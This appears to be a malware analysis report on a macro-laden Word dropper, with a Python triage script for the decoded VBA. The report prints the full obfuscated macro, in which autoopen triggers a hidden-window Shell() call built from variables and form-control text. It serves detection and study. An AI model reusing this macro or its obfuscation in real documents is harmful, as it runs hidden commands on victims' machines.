Verdict: MALICIOUS
Risk Score: 250

Malware Insights

MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1203 Exploitation for Client Execution (no parser exploit is identified in the findings below; execution comes from the VBA macro)
The sample is a malicious Word document (OLE) carrying VBA macros. The autoopen procedure in module Z27355739 runs when the document is opened and calls h628178176, which invokes Interaction.Shell(); this is the critical finding, since Shell() executes an arbitrary command. The command string itself is not visible in the source: it is concatenated at runtime from several variables and the contents of the TextBox1 form control declared in the same module, and the surrounding Select Case blocks are junk code that reads undefined variables under On Error Resume Next. The second Shell() argument, 69 - 69, evaluates to 0 (vbHide), so the spawned process runs with a hidden window. Together with the suspicious cmd.exe string and the ClamAV Doc.Dropper.Valyria signature, this indicates a dropper that downloads and executes a secondary payload; the payload itself is not recovered in this report.
Heuristics (8)

- ClamAV detection (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Valyria-6791454-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA. Matched line in script: `U3315846 = Array(s116382, r4643522, f7298718, Interaction.Shell(CVar("" + P4637368 + H82902 + l726652 + b241825 + Z27355739.TextBox1) + j90020692 + X720481, 69 - 69), f8349175)`. The first argument is built at runtime from variables and the TextBox1 form control, so the command is not recoverable from the source alone; the second argument folds to 0 (vbHide).
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched line in script: `Sub autoopen()` followed by the call `h628178176`.
- Suspicious cmd.exe invocation with execution flag (high, SC_STR_CMD): Suspicious cmd.exe invocation with execution flag. The matched string is not shown in this report.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note that the "no modern VBA project was recovered" wording conflicts with the decoded macros.bas artifact below; treat this finding as corroborating the AutoOpen entry point rather than as evidence of a second, WordBasic-era macro.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the standard DrawingML XML namespace and is expected in Office content; it is not a download or command-and-control indicator. No other URL was extracted, which is consistent with the command string being assembled at runtime rather than embedded in clear text.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4454 bytes | 27c5a13981a1ab00a74ff92d1a0b573f474a13fb328e547aa13ed73bd7ab1314 |
Preview of the extracted script (the viewer shows at most the first 1,000 lines; this listing is the complete 4454-byte artifact)

```vb
Attribute VB_Name = "Z27355739"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoopen()
h628178176
End Sub
Attribute VB_Name = "j42971819459"
Function h628178176()
On Error Resume Next
Select Case K384992240605800827765185
Case 144751343
w908 = N850
o363 = CInt(I8280 / CByte(Y732))
V482 = w5734
Case 141534471
I883 = s0924
P4675 = Y2770
S8829 = CInt(s1486 / CByte(B336))
Case 261107622
P417 = r430
o2863 = S6282
End Select
Select Case m63875215254000255558213
Case 135180174
A638 = D4212
j344 = CInt(K020 / CByte(B700))
k2265 = U556
Case 249734248
i5180 = i8222
z2250 = v4894
D575 = CInt(o095 / CByte(T806))
Case 44695207
N3661 = j4006
h408 = q752
End Select
U3315846 = Array(s116382, r4643522, f7298718, Interaction.Shell(CVar("" + P4637368 + H82902 + l726652 + b241825 + Z27355739.TextBox1) + j90020692 + X720481, 69 - 69), f8349175)
Select Case s5790952525084215539535
Case 224455089
z673 = i375
K578 = CInt(N568 / CByte(i9824))
z5447 = z603
Case 305731581
K6244 = z7982
v7887 = s594
p3282 = CInt(E994 / CByte(T3736))
Case 262432759
n134 = V0420
V5199 = B239
End Select
Select Case m673943567364264468
Case 241816469
a2623 = b1159
E7195 = CInt(t0850 / CByte(X391))
A130 = L4126
Case 192144770
Y5257 = b650
s8112 = i005
E5696 = CInt(j833 / CByte(N309))
Case 283090472
z4682 = X352
p577 = f479
End Select
End Function
Attribute VB_Name = "S3436146121455"
Attribute VB_Name = "q932149564434"
Attribute VB_Name = "i4507179262"
Attribute VB_Name = "w550655097"
Attribute VB_Name = "Q98282368610597"
Attribute VB_Name = "b91661048"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Z78713307"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "w8655557939"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "v9847244"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "P9445643591"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "E175011070"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "I694602643722"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
```
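The autoopen to Shell() chain and the hidden-window argument can be recovered mechanically from the decoded source. The script below is an added example written for this report; it is not part of oletools or of the sandbox that produced the findings. It runs on a constructed, trimmed excerpt of the macros.bas listing (the junk Select Case blocks are omitted because they do not affect control flow), uses only the Python standard library, and assumes the WindowStyle argument is integer arithmetic using only + - * and parentheses, which Python's parser reads the same way VBA does. It finds auto-exec entry points, follows bare-name calls to the procedure that calls Shell(), separates the command expression from the WindowStyle argument, folds constant arithmetic such as 69 - 69, and lists any form-control references used to assemble the command.

```python
"""Static triage of decoded VBA: auto-exec entry points, the call chain to Shell(),
the constant-folded WindowStyle argument, and form-control string sources.
Added example for this report; not part of oletools or of the sandbox."""
import ast
import operator
import re

# Constructed excerpt of the macros.bas listed above (trimmed: the junk Select Case
# blocks are omitted because they do not affect control flow).
SAMPLE_VBA = r'''
Attribute VB_Name = "Z27355739"
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoopen()
h628178176
End Sub
Attribute VB_Name = "j42971819459"
Function h628178176()
On Error Resume Next
U3315846 = Array(s116382, r4643522, f7298718, Interaction.Shell(CVar("" + P4637368 + H82902 + l726652 + b241825 + Z27355739.TextBox1) + j90020692 + X720481, 69 - 69), f8349175)
End Function
'''

# Procedure names Office runs without user interaction (VBA names are case-insensitive).
AUTOEXEC = {"autoopen", "auto_open", "document_open", "workbook_open",
            "autoexec", "autoclose", "auto_close", "document_close"}
# Shell() WindowStyle values; 0 (vbHide) runs the spawned process with no visible window.
WINDOW_STYLE = {0: "vbHide", 1: "vbNormalFocus", 2: "vbMinimizedFocus",
                3: "vbMaximizedFocus", 4: "vbNormalNoFocus", 6: "vbMinimizedNoFocus"}
OPS = {ast.Add: operator.add, ast.Sub: operator.sub, ast.Mult: operator.mul, ast.USub: operator.neg}
PROC_RE = re.compile(r"^\s*(?:Public\s+|Private\s+)?(?:Sub|Function)\s+(\w+)\s*\(", re.I | re.M)
END_RE = re.compile(r"^\s*End\s+(?:Sub|Function)\s*$", re.I | re.M)


def split_procedures(src):
    """Map lower-cased procedure name -> body text for every Sub/Function in the module."""
    procs = {}
    for m in PROC_RE.finditer(src):
        end = END_RE.search(src, m.end())
        procs[m.group(1).lower()] = src[m.end():end.start() if end else len(src)]
    return procs


def const_window_style(arg):
    """Fold integer arithmetic such as '69 - 69' to an int, or None if it is not constant.
    Assumes the VBA expression uses only + - * and parentheses (same syntax as Python)."""
    def ev(node):
        if isinstance(node, ast.Constant) and isinstance(node.value, int):
            return node.value
        if isinstance(node, ast.BinOp) and type(node.op) in OPS:
            return OPS[type(node.op)](ev(node.left), ev(node.right))
        if isinstance(node, ast.UnaryOp) and type(node.op) in OPS:
            return OPS[type(node.op)](ev(node.operand))
        raise ValueError("not a constant integer expression")
    try:
        return ev(ast.parse(arg.strip(), mode="eval").body)
    except (SyntaxError, ValueError):
        return None


def find_shell_calls(body):
    """One record per Shell(...) call: command expression, WindowStyle, form-control sources.
    Parentheses or commas inside string literals are not handled."""
    calls = []
    for m in re.finditer(r"\bShell\s*\(", body, re.I):
        depth, i, comma = 1, m.end(), None
        while i < len(body) and depth:            # scan to the matching close paren,
            depth += {"(": 1, ")": -1}.get(body[i], 0)
            if body[i] == "," and depth == 1:     # remembering the last top-level comma
                comma = i
            i += 1
        end = i - 1                               # index of the closing paren
        cmd = body[m.end():comma if comma else end].strip()
        # VBA starts the program minimized with focus (2) when WindowStyle is omitted.
        ws = const_window_style(body[comma + 1:end]) if comma else 2
        controls = re.findall(r"\b\w+\.(?:TextBox|Label|ComboBox|ListBox)\w*", cmd)
        calls.append({"command_expr": cmd, "window_style": ws, "form_controls": controls})
    return calls


def reachable(procs, start):
    """Procedures reachable from `start` through bare-name calls (depth-first)."""
    seen, stack = set(), [start]
    while stack:
        name = stack.pop()
        if name in seen or name not in procs:
            continue
        seen.add(name)
        stack.extend(t.lower() for t in re.findall(r"\b\w+\b", procs[name]) if t.lower() in procs)
    return seen


def triage(src):
    """Shell() calls reachable from an auto-exec entry point, flagged when the window is hidden."""
    findings, procs = [], split_procedures(src)
    for entry in sorted(set(procs) & AUTOEXEC):
        for proc in sorted(reachable(procs, entry)):
            for call in find_shell_calls(procs[proc]):
                ws = call["window_style"]
                findings.append(dict(call, entry=entry, via=proc, hidden=ws == 0,
                                     window_style_name=WINDOW_STYLE.get(ws, "unknown")))
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_VBA):
        print(finding)
```

On the excerpt this reports a single finding: entry `autoopen`, reached via `h628178176`, WindowStyle 0 (vbHide) and `Z27355739.TextBox1` as a form-control source for the command string. Because the command itself is concatenated from variables and control text at runtime, the next step in practice is dynamic: dump the document's form data (the TextBox1 value lives in the embedded MSForms stream) or run the macro in an instrumented sandbox with Shell() hooked.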